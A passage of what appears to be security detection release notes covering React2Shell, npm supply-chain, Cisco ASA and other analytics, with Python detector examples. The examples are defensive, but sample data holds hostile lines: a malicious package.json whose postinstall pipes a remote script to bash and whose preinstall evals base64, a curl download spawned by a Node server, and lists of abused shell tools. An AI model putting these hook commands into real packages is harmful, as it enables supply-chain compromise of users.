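                "patterns": [name for name, hit in (("ssh", ssh), ("http", http)) if hit],
                "risk_score": anchor["score"] + sum(e["score"] for e in supporting),
                "rules": sorted({anchor["rule"], *(e["rule"] for e in supporting)}),
            })
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

Only `fw-edge-01` produces a finding: the lone account creation on `fw-edge-02`, the out-of-window pair on `fw-edge-03` and the unanchored SSH event on `fw-edge-04` all stay below the correlation threshold, which is the point of combining the signals rather than alerting on each.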
New Analytic Story - [5]
New Analytics - [25]
- Cisco Isovalent - Access To Cloud Metadata Service
- Cisco Isovalent - Cron Job Creation
- Cisco Isovalent - Curl Execution With Insecure Flags
- Cisco Isovalent - Kprobe Spike
- Cisco Isovalent - Late Process Execution
- Cisco Isovalent - Non Allowlisted Image Use
- Cisco Isovalent - Nsenter Usage in Kubernetes Pod
- Cisco Isovalent - Pods Running Offensive Tools
- Cisco Isovalent - Potential Escape to Host
- Cisco Isovalent - Shell Execution
- Cisco Privileged Account Creation with HTTP Command Execution
- Cisco Privileged Account Creation with Suspicious SSH Activity
- Cisco Secure Firewall - Privileged Command Execution via HTTP
- Cisco Secure Firewall - SSH Connection to Non-Standard Port
- Cisco Secure Firewall - SSH Connection to sshd_operns
- HTTP C2 Framework User Agent
- HTTP Malware User Agent
- HTTP PUA User Agent
- HTTP RMM User Agent
- HTTP Scripting Tool User Agent
- Windows Chrome Auto-Update Disabled via Registry
- Windows Chrome Enable Extension Loading via Command-Line
- Windows Chrome Extension Allowed Registry Modification
- Windows Chromium Process Loaded Extension via Command-Line
- Windows Potential AppDomainManager Hijack Artifacts Creation
Other Updates
- Performance & Coverage Improvements – Updated several searches by replacing regex-based matching with direct match-driven comparisons, which significantly improves performance and scalability in large environments, and refreshed multiple lookup files to keep detection logic accurate and up to date
Breaking Changes
As previously communicated in ESCU v5.18.0, several detections have been removed in v5.20.0:
v5.19.0
🚀 Key Highlights
🐚 React2Shell (CVE-2025-55182):
Introduced a new analytic story, React2Shell, addressing the critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components. This vulnerability affects React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, as well as Next.js 15.x and 16.x versions using the App Router. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints, allowing attackers to execute arbitrary JavaScript code on the server without authentication.
New detections provide coverage for both Windows and Linux environments, focusing on suspicious child processes spawned by Node.js, React, or Next.js server processes, including execution of shells, scripting interpreters, and system utilities commonly abused post-exploitation. Additionally, a network-based detection leverages Cisco Secure Firewall Threat Defense Intrusion Events to identify React Server Components remote code execution attempts at the network layer, providing early visibility into exploitation attempts.
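The child-process pattern the React2Shell detections look for can be shown with the following added example (not ESCU's search): process events whose parent is a Node.js binary running a React/Next.js server and whose child is a shell, interpreter or system utility are flagged, on both Linux and Windows telemetry. The event fields and the events are constructed, and the suspicious-child and server-marker lists are an illustrative selection rather than the release's full lookup.

```python
"""Suspicious children of Node.js/Next.js server processes.

Added example for this release note, not ESCU's search. Event fields and
events are constructed; the child and marker lists are illustrative.
"""

NODE_BINARIES = {"node", "node.exe", "nodejs"}
# substrings in the parent's command line that mark a React/Next.js server
SERVER_MARKERS = ("next", "react-server", "server.js")
SUSPICIOUS_CHILDREN = {
    # Linux
    "sh", "bash", "dash", "zsh", "python", "python3", "perl", "curl", "wget",
    "nc", "ncat", "whoami", "id", "uname",
    # Windows
    "cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe", "net.exe",
}


def basename(path):
    """Last path component, case-folded, for either path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_node_server(parent_path, parent_cmd):
    """True when the parent is a Node.js binary serving a React/Next.js app."""
    cmd = parent_cmd.lower()
    return basename(parent_path) in NODE_BINARIES and any(m in cmd for m in SERVER_MARKERS)


def detect(events):
    """Return one hit per suspicious child of a Node.js/Next.js server process."""
    hits = []
    for ev in events:
        child = basename(ev["process_path"])
        if child in SUSPICIOUS_CHILDREN and is_node_server(ev["parent_path"], ev["parent_cmd"]):
            hits.append({"host": ev["host"], "parent": basename(ev["parent_path"]),
                         "child": child, "cmd": ev["process_cmd"]})
    return hits


def _ev(host, parent_path, parent_cmd, process_path, process_cmd):
    """Build one constructed process-creation event."""
    return {"host": host, "parent_path": parent_path, "parent_cmd": parent_cmd,
            "process_path": process_path, "process_cmd": process_cmd}


# Constructed events: three post-exploitation children, three benign cases
SAMPLE_EVENTS = [
    _ev("web-01", "/usr/bin/node", "node /app/node_modules/.bin/next start",
        "/bin/sh", "sh -c id"),
    _ev("web-01", "/usr/bin/node", "node /app/node_modules/.bin/next start",
        "/usr/bin/curl", "curl http://203.0.113.5/x -o /tmp/x"),
    _ev("web-02", r"C:\Program Files\nodejs\node.exe", "node.exe server.js",
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    # build script, not a server process
    _ev("build-01", "/usr/bin/node", "node build.js", "/bin/sh", "sh -c ls"),
    # a server spawning another node worker is expected
    _ev("web-01", "/usr/bin/node", "node /app/node_modules/.bin/next start",
        "/usr/bin/node", "node worker.js"),
    # parent is not node at all
    _ev("web-03", "/usr/bin/bash", "bash", "/usr/bin/curl", "curl https://example.org"),
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Keying on the parent's command line rather than only its binary name is what keeps build tooling (`node build.js` spawning `sh`) out of the results while still catching the Windows `node.exe server.js` case.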
👾 Tuoni C2 Framework:
Introduced a new analytic story addressing threats from the Tuoni command-and-control framework, a sophisticated cross-platform red teaming tool increasingly adopted by threat actors for real-world attacks. Tuoni enables adversaries to deploy malicious payloads directly into system memory, bypassing traditional disk-based detection mechanisms. Its modular design supports multiple attack variations and allows operators to maintain persistence and execute commands across Windows, Linux, and macOS environments without leaving significant forensic artifacts. New detections focus on identifying Tuoni's memory-based execution patterns, suspicious process behaviors, and command-and-control communication indicators commonly associated with this framework, providing security teams with visibility into attacks that leverage this emerging threat tool.
🔐 Kerberos Coercion with DNS (CVE-2025-33073):
Introduced comprehensive detection coverage for the recently disclosed CVE-2025-33073 vulnerability, where attackers leverage DNS records to trigger Kerberos authentication from remote hosts—a technique that can lead to credential relay or domain privilege escalation. New detections including Windows Short-Lived DNS Record, Windows Kerberos Coercion via DNS, Windows Credential Target Information Structure in Command Line, and DNS Kerberos Coercion provide end-to-end visibility into DNS-based coercion behaviors across authentication and name resolution events, enabling SOCs to identify identity coercion attacks that often unfold silently inside Active Directory environments.
📦 NPM Supply Chain Compromise (Shai-Hulud Campaigns):
Expanded detection coverage for npm ecosystem supply chain compromises, addressing both the Shai-Hulud 2.0 worm campaign and recurring lifecycle hook abuse patterns. Added analytics to detect malicious npm package installations that execute arbitrary scripts through preinstall, install, postinstall, or prepare hooks—a long-standing risk vector exploited in major incidents from event-stream (2018) to ua-parser-js (2021) and Shai-Hulud (2025). New detections monitor GitHub workflow tampering, credential theft, and cross-platform exfiltration behaviors that often unfold silently inside CI/CD pipelines, giving defenders early visibility into malicious package lifecycle hooks and enhancing the ability to detect supply chain compromise before widespread impact.
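The lifecycle-hook risk described above is easiest to see on the manifest itself. The following added example (not one of ESCU's analytics) parses package.json files, extracts the preinstall, install, postinstall and prepare hooks, and scores their commands for patterns that recur in malicious packages: a remote script piped into a shell, inline Node or PowerShell evaluation, base64-encoded content, and network fetches during install. The manifests are constructed and the indicator patterns are an illustrative set.

```python
"""Lifecycle-hook scanner for npm package.json manifests.

Added example for this release note, not an ESCU analytic. The manifests
are constructed and the indicator patterns are illustrative.
"""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (compiled pattern, reason) pairs checked against each hook command
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|&;]*\|\s*(sh|bash)\b"), "remote script piped to shell"),
    (re.compile(r"\bnode\s+-e\b"), "inline node evaluation"),
    (re.compile(r"\b(powershell|pwsh)\b.*-(enc|encodedcommand)\b", re.I), "encoded PowerShell"),
    (re.compile(r"\bbase64\b"), "base64 encoded content"),
    (re.compile(r"\beval\s*\("), "eval of dynamic code"),
    (re.compile(r"https?://"), "network fetch in hook"),
]


def scan_manifest(text):
    """Return one record per lifecycle hook present, with the reasons it matched."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [reason for rx, reason in INDICATORS if rx.search(cmd)]
        findings.append({"package": pkg.get("name"), "hook": hook, "command": cmd,
                         "reasons": reasons, "suspicious": bool(reasons)})
    return findings


def suspicious_hooks(manifests):
    """Scan several manifests and keep only the hooks that matched an indicator."""
    return [f for text in manifests for f in scan_manifest(text) if f["suspicious"]]


# Constructed manifests: one benign (a common git-hooks installer), one malicious
BENIGN_MANIFEST = r"""
{
  "name": "good-lib",
  "version": "1.4.0",
  "scripts": {
    "prepare": "husky install",
    "test": "jest"
  }
}
"""

MALICIOUS_MANIFEST = r"""
{
  "name": "evil-pkg",
  "version": "0.0.3",
  "scripts": {
    "preinstall": "node -e \"eval(Buffer.from('aWQ=','base64').toString())\"",
    "postinstall": "curl -s https://203.0.113.7/s.sh | bash",
    "test": "echo ok"
  }
}
"""


if __name__ == "__main__":
    for f in suspicious_hooks([BENIGN_MANIFEST, MALICIOUS_MANIFEST]):
        print(f"{f['package']}:{f['hook']} -> {', '.join(f['reasons'])}")
```

A benign `prepare` hook such as `husky install` is reported with an empty reason list so that hook presence and hook suspicion stay separate signals. Installing with `npm install --ignore-scripts` (or setting `ignore-scripts=true` in npm config) prevents these hooks from running at all, which is the preventive counterpart to this detection.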
🖥️ NetSupport RMM Tool Abuse:
Strengthened detection coverage for malicious use of the NetSupport Manager RMM tool, which adversaries frequently deploy for covert remote access under the guise of legitimate remote-support activity. New analytics identify NetSupport's presence through loaded module patterns, executable masquerading, and registry manipulation, helping distinguish authorized IT administration from unauthorized NetSupport-based intrusions involving renamed binaries, PowerShell-assisted deployment, suspicious startup locations, and stealthy remote control sessions. These detections complement updated credential-theft coverage to surface cases where NetSupport is deployed as part of a broader credential access or persistence chain.
🤖 Suspicious Local LLM Frameworks (Shadow AI):
Added new analytics to address the rise of Shadow AI—unauthorized deployment of local Large Language Model (LLM) frameworks such as Ollama, LM Studio, GPT4All, Jan, llama.cpp, and KoboldCPP inside enterprise environments. These tools allow users to run powerful models locally, creating blind spots for data exfiltration, policy violations, and unmonitored processing of sensitive information. New detections monitor model file downloads (.gguf, .ggml, .safetensors), suspicious process execution, and DNS lookups to model repositories, providing defenders with early warning before unmonitored AI runtimes become channels for data exposure or endpoint abuse.
🔥 Suspicious Cisco ASA Activity:
Expanded detection coverage for malicious or unauthorized activity on Cisco Adaptive Security Appliances (ASA), representing the most extensive set of Cisco ASA security analytics released to date. New detections focus on configuration tampering, credential misuse, and covert administrative behaviors often seen in targeted network compromise and firewall takeover scenarios. Analytics surface high-risk events including AAA policy modification, logging filter tampering, logging message suppression, packet capture activation, and device file copy operations—both locally and to remote destinations. Additional detections highlight identity-based abuse such as new local user account creation, user deletion, privilege level changes, and lockout threshold anomalies, along with reconnaissance command usage that may reveal adversary staging or pre-attack mapping. By bringing ASA telemetry into the same analytic ecosystem as NVM, FTD, Duo, Umbrella, and Talos-driven rapid responses, this update enhances visibility into attempts to weaken audit controls, establish persistence, exfiltrate configuration data, or manipulate security boundaries on Cisco ASA devices.
New Analytic Story - [6]
- Kerberos Coercion with DNS
- NPM Supply Chain Compromise
- NetSupport RMM Tool Abuse
- React2Shell
- Suspicious Local LLM Frameworks
- Tuoni
New Analytics - [31]
- Cisco ASA - AAA Policy Tampering
- Cisco ASA - Device File Copy Activity
- Cisco ASA - Device File Copy to Remote Location
- Cisco ASA - Logging Filters Configuration Tampering
- Cisco ASA - Logging Message Suppression
- Cisco ASA - New Local User Account Created
- Cisco ASA - Packet Capture Activity
- Cisco ASA - Reconnaissance Command Activity
- Cisco ASA - User Account Deleted From Local Database
- Cisco ASA - User Account Lockout Threshold Exceeded
- Cisco ASA - User Privilege Level Change
- Cisco Secure Firewall - React Server Components RCE Attempt
- DNS Kerberos Coercion
- GitHub Workflow File Creation or Modification
- LLM Model File Creation
- Linux Suspicious React or Next.js Child Process
- Local LLM Framework DNS Query
- Shai-Hulud 2 Exfiltration Artifact Files
- Shai-Hulud Workflow File Creation or Modification
- Windows Credential Target Information Structure in Commandline
- Windows Executable Masquerading as Benign File Types
- Windows Kerberos Coercion via DNS
- Windows Local LLM Framework Execution
- Windows NetSupport RMM DLL Loaded By Uncommon Process
- Windows PUA Named Pipe
- [Windows RMM Named Pipe](https://research.splunk.com/endpoint/c07c7138-e...